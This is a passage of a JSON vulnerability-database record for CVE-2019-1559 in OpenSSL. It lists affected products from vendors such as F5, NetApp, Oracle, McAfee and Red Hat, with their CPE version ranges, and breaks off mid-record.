"eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "8.15.1" }, { "model": "big-ip analytics", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.10" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "8.0.0" }, { "model": "mysql", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "5.7.25" }, { "model": "a320", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip policy enforcement manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "service processor", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip domain name system", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip analytics", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "data exchange layer", "scope": "lt", "trust": 1.0, "vendor": "mcafee", "version": "6.0.0" }, { "model": "big-ip application security manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "communications session border controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.4" }, { "model": "big-ip application acceleration manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "agent", "scope": "gte", "trust": 1.0, "vendor": "mcafee", "version": "5.6.0" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "15.0" }, { "model": "active iq unified manager", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "7.3" }, { "model": "big-ip policy enforcement manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "active iq unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "pan-os", "scope": "lt", "trust": 1.0, "vendor": "paloaltonetworks", "version": "7.1.15" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "31" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "8.8.1" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.2r" }, { "model": "big-ip local traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.3.0.0.0" }, { "model": "oncommand insight", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.4.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "big-ip policy enforcement manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "jp1/snmp system observer", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "steelstore cloud integrated storage", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "oncommand workflow automation", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "jp1/operations analytics", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "job management system partern 1/automatic job management system 3", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "storagegrid webscale", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "nessus", "scope": null, "trust": 0.8, "vendor": "tenable", "version": null }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "leap", "scope": null, "trust": 0.8, "vendor": "opensuse", "version": null }, { "model": "jp1/automatic job management system 3", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "traffix sdc", "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": "jp1/data highway", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "openssl", "scope": null, "trust": 0.8, "vendor": "openssl", "version": null }, { "model": "ucosminexus primary server", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "ucosminexus developer", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "ubuntu", "scope": null, "trust": 0.8, "vendor": "canonical", "version": null }, { "model": "ucosminexus service platform", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "santricity smi-s provider", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "gnu/linux", "scope": null, "trust": 0.8, "vendor": "debian", "version": null }, { "model": "ontap select deploy administration utility", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "jp1/it desktop management 2", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "jp1/performance management", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "ontap select deploy", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "snapdrive", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "oncommand unified manager", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "jp1/automatic operation", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "cosminexus http server", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null }, { "model": "hyper converged infrastructure", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "element software", "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": "ucosminexus application server", "scope": null, "trust": 0.8, "vendor": "\u65e5\u7acb", "version": null } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "NVD", "id": "CVE-2019-1559" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.2r", "versionStartIncluding": "1.0.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:hyper_converged_infrastructure:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:santricity_smi-s_provider:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapdrive:-:*:*:*:*:unix:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:ontap_select_deploy:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:storagegrid:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:storagegrid:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.0.4", "versionStartIncluding": "9.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:vsphere:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:smi-s_provider:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:clustered_data_ontap_antivirus_connector:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapdrive:-:*:*:*:*:windows:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "cpe_name": [], "versionStartIncluding": "7.3", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe_name": [], "versionStartIncluding": "9.5", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapprotect:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager_core_package:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:altavault:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.1.0", "versionStartIncluding": "5.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:4.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "6.1.0", "versionStartIncluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "12.1.5", "versionStartIncluding": "12.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "13.1.3", "versionStartIncluding": "13.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "14.1.2", "versionStartIncluding": "14.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.1.0", "versionStartIncluding": "15.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "7.1.0", "versionStartIncluding": "7.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "8.2.3", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:cn1610_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:cn1610:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:a320_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:a320:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:c190_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:c190:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:a220_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:a220:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:fas2720_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:fas2720:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:fas2750_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:fas2750:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:a800_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:a800:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mcafee:data_exchange_layer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.0.0", "versionStartIncluding": "4.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mcafee:agent:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.6.4", "versionStartIncluding": "5.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mcafee:threat_intelligence_exchange_server:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.0.0", "versionStartIncluding": "2.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:mcafee:web_gateway:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "9.0.0", "versionStartIncluding": "7.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_web_server:5.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 